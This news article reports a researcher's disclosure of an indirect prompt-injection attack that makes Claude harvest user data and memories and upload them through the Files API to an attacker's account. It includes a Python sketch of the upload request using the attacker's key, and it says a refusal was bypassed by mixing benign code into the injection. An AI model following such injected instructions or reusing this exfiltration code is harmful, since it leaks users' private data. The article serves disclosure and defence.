SecurityWeek

Artificial Intelligence

Claude AI APIs Can Be Abused for Data Exfiltration

An attacker can inject indirect prompts to trick the model into harvesting user data and sending it to the attacker’s account.


Attackers can use indirect prompt injections to trick Anthropic’s Claude into exfiltrating data the AI model’s users have access to, a security researcher has discovered.

The attack, Johann Rehberger of Embrace The Red explains, abuses Claude's Files API and is only possible if the AI model has network access (a feature enabled by default on certain plans, meant to allow Claude to reach resources such as code repositories and Anthropic APIs).

The attack is relatively straightforward: an indirect prompt injection payload can be used to read user data and store it in a file in Claude Code Interpreter’s sandbox, and then to trick the model into interacting with the Anthropic API using a key provided by the attacker.

The code in the payload requests Claude to upload the Code Interpreter file from the sandbox but, because the attacker’s API key is used, the file is uploaded to the attacker’s account.

“With this technique an adversary can exfiltrate up to 30MB at once according to the file API documentation, and of course we can upload multiple files,” Rehberger explains.
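The exfiltration step described above boils down to a plain HTTP upload to Anthropic's Files API, authenticated with the attacker's key rather than the victim's. The sketch below is illustrative only, not Rehberger's actual payload: it builds (but does not send) such an upload request. The endpoint, version header, and beta header follow Anthropic's public Files API documentation; the key, filename, and data are placeholders, and a real upload would use multipart/form-data encoding.

```python
# Illustrative sketch of the exfiltration mechanism described in the article:
# a file upload to the Anthropic Files API authenticated with an
# attacker-supplied key, so the file lands in the attacker's account.
# The request is built but never sent; all values are placeholders.
import urllib.request

ATTACKER_API_KEY = "sk-ant-EXAMPLE"  # attacker-controlled key (placeholder)

def build_upload_request(api_key: str, payload: bytes) -> urllib.request.Request:
    """Prepare (but do not send) a Files API upload request."""
    return urllib.request.Request(
        url="https://api.anthropic.com/v1/files",
        method="POST",
        headers={
            # Whoever owns this key receives the uploaded file.
            "x-api-key": api_key,
            "anthropic-version": "2023-06-01",
            # The Files API is gated behind a beta header.
            "anthropic-beta": "files-api-2025-04-14",
        },
        data=payload,  # a real upload would be multipart/form-data
    )

req = build_upload_request(ATTACKER_API_KEY, b"<harvested user data>")
```

Because the sandbox only needs outbound access to `api.anthropic.com`, a domain the victim's own workflow already trusts, the upload does not stand out as traffic to an attacker-controlled server.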

While the initial attempt was successful, Claude subsequently refused the payload, particularly when the API key appeared in plain text, and Rehberger had to mix benign code into the prompt injection to convince Claude that it did not have malicious intent.


The attack starts with the user loading into Claude, for analysis, a malicious document received from the attacker. The exploit code hijacks the model, which follows the malicious instructions to harvest the user's data, save it to the sandbox, and then call the Anthropic Files API to send it to the attacker's account.

According to the researcher, the attack can be used to exfiltrate the user’s chat conversations, which are saved by Claude using the newly introduced ‘memories’ feature. The attacker can view and access the exfiltrated file in their console.

The researcher disclosed the attack to Anthropic via HackerOne on October 25, but the report was closed with the explanation that this was a model safety issue and not a security vulnerability.

However, after publishing information on the attack, Rehberger was notified by Anthropic that the data exfiltration vulnerability is in-scope for reporting.

Anthropic's documentation underlines the risks associated with giving Claude network access, warning that attacks carried out via external files or websites can lead to code execution and information leaks. It also provides recommended mitigations against such attacks.

SecurityWeek has emailed Anthropic to inquire whether the company plans to devise a mitigation for such attacks.

Related: All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

Related: Nvidia Triton Vulnerabilities Pose Big Risk to AI Models

Related: AI Sidebar Spoofing Puts ChatGPT Atlas, Perplexity Comet and Other Browsers at Risk

Related: Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
